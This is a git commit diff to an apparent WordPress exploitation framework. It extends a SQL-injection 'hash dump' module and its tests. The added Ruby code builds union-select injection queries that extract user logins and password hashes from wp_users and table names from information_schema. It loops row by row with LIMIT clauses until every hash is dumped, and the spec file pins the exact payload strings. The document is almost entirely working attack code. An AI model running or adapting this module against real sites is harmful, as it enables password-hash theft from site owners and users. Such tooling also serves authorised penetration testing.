Add #reveals_one_row_per_request to support more SQLi vectors

rastating · rastating · commit cb9367adf69c · 2017-11-13T23:11:03.000Z
diff --git a/lib/wpxf/wordpress/hash_dump.rb b/lib/wpxf/wordpress/hash_dump.rb
@@ -24,18 +24,31 @@ def export_path
     File.expand_path normalized_option_value('export_path')
   end
 
+  # @return [Boolean] returns true if only one row of the SQL query will be displayed per request.
+  def reveals_one_row_per_request
+    false
+  end
+
   # @return [String] a unique SQL select statement that can be used to extract the hashes.
   def hashdump_sql_statement
     cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
     cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{eof_token})"
-    "select #{cols.join(',')} from #{table_prefix}users"
+
+    query = "select #{cols.join(',')} from #{table_prefix}users"
+    return query unless reveals_one_row_per_request
+
+    "#{query} limit #{current_row},1"
   end
 
   # @return [String] a unique SEL select statement that can be used to fingerprint the database prefix.
   def hashdump_prefix_fingerprint_statement
     cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
     cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,table_name,0x3a,#{eof_token})"
-    "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
+
+    query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
+    return query unless reveals_one_row_per_request
+
+    "#{query} limit #{current_row},1"
   end
 
   # @return [Integer] the zero-based index of the column which is visible in the response output.
@@ -80,10 +93,12 @@ def run
 
     generate_id_tokens
 
+    @current_row = 0
     emit_info 'Determining database prefix...'
     return false unless determine_prefix
     emit_success "Found prefix: #{table_prefix}", true
 
+    @current_row = 0
     emit_info 'Dumping user hashes...'
     hashes = dump_and_parse_hashes
     output_hashdump_table(hashes)
@@ -102,7 +117,11 @@ def eof_token
     @eof_token
   end
 
-  def dump_and_parse_hashes
+  def current_row
+    @current_row
+  end
+
+  def execute_hashdump_request
     res = execute_request(
       method: hashdump_request_method,
       url: vulnerable_url,
@@ -112,7 +131,28 @@ def dump_and_parse_hashes
     )
 
     return false unless res&.code == 200
-    parse_hashdump_body(res.body)
+    res
+  end
+
+  def dump_and_parse_hashes
+    unless reveals_one_row_per_request
+      res = execute_hashdump_request
+      return parse_hashdump_body(res.body)
+    end
+
+    eof = false
+    hashes = []
+
+    until eof
+      res = execute_hashdump_request
+      break unless res.body.match?(/#{bof_token}\:(.+?)\:#{eof_token}/)
+
+      hash = parse_hashdump_body(res.body)
+      hashes.push([hash[0][0], hash[0][1]]) if hash
+      @current_row += 1
+    end
+
+    hashes
   end
 
   def build_prefix_request_body
@@ -153,7 +193,18 @@ def determine_prefix
     )
 
     return nil unless res&.code == 200
+
+    # If the prefix is found, regardless of the row mode, return it.
     @table_prefix = res.body[/#{bof_token}\:([^,]+?)usermeta\:#{eof_token}/, 1]
+    return @table_prefix if @table_prefix
+    return nil unless reveals_one_row_per_request
+
+    # If the bof and eof tokens weren't found at all, there are no more rows available.
+    return nil unless res.body.match?(/#{bof_token}\:(.+?)\:#{eof_token}/)
+
+    # If the tokens were found, then we can try to query another row.
+    @current_row += 1
+    determine_prefix
   end
 
   def output_hashdump_table(hashes)
diff --git a/spec/wordpress/hash_dump_spec.rb b/spec/wordpress/hash_dump_spec.rb
@@ -23,27 +23,62 @@
   end
 
   describe '#hashdump_sql_statement' do
-    it 'returns a select statement that will select all user hashes' do
-      allow(subject).to receive(:hashdump_number_of_cols).and_return(3)
-      allow(subject).to receive(:hashdump_visible_field_index).and_return(1)
-      allow(subject).to receive(:table_prefix).and_return('wp_')
-      allow(subject).to receive(:bof_token).and_return(123)
-      allow(subject).to receive(:eof_token).and_return(321)
-
-      expected_query = 'select 0,concat(123,0x3a,user_login,0x3a,user_pass,0x3a,321),0 from wp_users'
-      expect(subject.hashdump_sql_statement).to eq expected_query
+    context 'when #reveals_one_row_per_request is false' do
+      it 'returns a select statement that will select all user hashes with no limit clause' do
+        allow(subject).to receive(:reveals_one_row_per_request).and_return(false)
+        allow(subject).to receive(:hashdump_number_of_cols).and_return(3)
+        allow(subject).to receive(:hashdump_visible_field_index).and_return(1)
+        allow(subject).to receive(:table_prefix).and_return('wp_')
+        allow(subject).to receive(:bof_token).and_return(123)
+        allow(subject).to receive(:eof_token).and_return(321)
+
+        expected_query = 'select 0,concat(123,0x3a,user_login,0x3a,user_pass,0x3a,321),0 from wp_users'
+        expect(subject.hashdump_sql_statement).to eq expected_query
+      end
+    end
+
+    context 'when #reveals_one_row_per_request is true' do
+      it 'returns a select statement that will select all user hashes with a limit clause' do
+        allow(subject).to receive(:reveals_one_row_per_request).and_return(true)
+        allow(subject).to receive(:hashdump_number_of_cols).and_return(3)
+        allow(subject).to receive(:hashdump_visible_field_index).and_return(1)
+        allow(subject).to receive(:table_prefix).and_return('wp_')
+        allow(subject).to receive(:bof_token).and_return(123)
+        allow(subject).to receive(:eof_token).and_return(321)
+        allow(subject).to receive(:current_row).and_return(3)
+
+        expected_query = 'select 0,concat(123,0x3a,user_login,0x3a,user_pass,0x3a,321),0 from wp_users limit 3,1'
+        expect(subject.hashdump_sql_statement).to eq expected_query
+      end
     end
   end
 
   describe '#hashdump_prefix_fingerprint_statement' do
-    it 'returns a select statement that will select all table names in the current database' do
-      allow(subject).to receive(:hashdump_number_of_cols).and_return(3)
-      allow(subject).to receive(:hashdump_visible_field_index).and_return(1)
-      allow(subject).to receive(:bof_token).and_return(123)
-      allow(subject).to receive(:eof_token).and_return(321)
-
-      expected_query = 'select 0,concat(123,0x3a,table_name,0x3a,321),0 from information_schema.tables where table_schema = database()'
-      expect(subject.hashdump_prefix_fingerprint_statement).to eq expected_query
+    context 'when #reveals_one_row_per_request is false' do
+      it 'returns a select statement that will select all table names in the current database' do
+        allow(subject).to receive(:reveals_one_row_per_request).and_return(false)
+        allow(subject).to receive(:hashdump_number_of_cols).and_return(3)
+        allow(subject).to receive(:hashdump_visible_field_index).and_return(1)
+        allow(subject).to receive(:bof_token).and_return(123)
+        allow(subject).to receive(:eof_token).and_return(321)
+
+        expected_query = 'select 0,concat(123,0x3a,table_name,0x3a,321),0 from information_schema.tables where table_schema = database()'
+        expect(subject.hashdump_prefix_fingerprint_statement).to eq expected_query
+      end
+    end
+
+    context 'when #reveals_one_row_per_request is true' do
+      it 'returns a select statement that will select all table names in the current database with a limit clause' do
+        allow(subject).to receive(:reveals_one_row_per_request).and_return(true)
+        allow(subject).to receive(:hashdump_number_of_cols).and_return(3)
+        allow(subject).to receive(:hashdump_visible_field_index).and_return(1)
+        allow(subject).to receive(:bof_token).and_return(123)
+        allow(subject).to receive(:eof_token).and_return(321)
+        allow(subject).to receive(:current_row).and_return(3)
+
+        expected_query = 'select 0,concat(123,0x3a,table_name,0x3a,321),0 from information_schema.tables where table_schema = database() limit 3,1'
+        expect(subject.hashdump_prefix_fingerprint_statement).to eq expected_query
+      end
     end
   end
 end
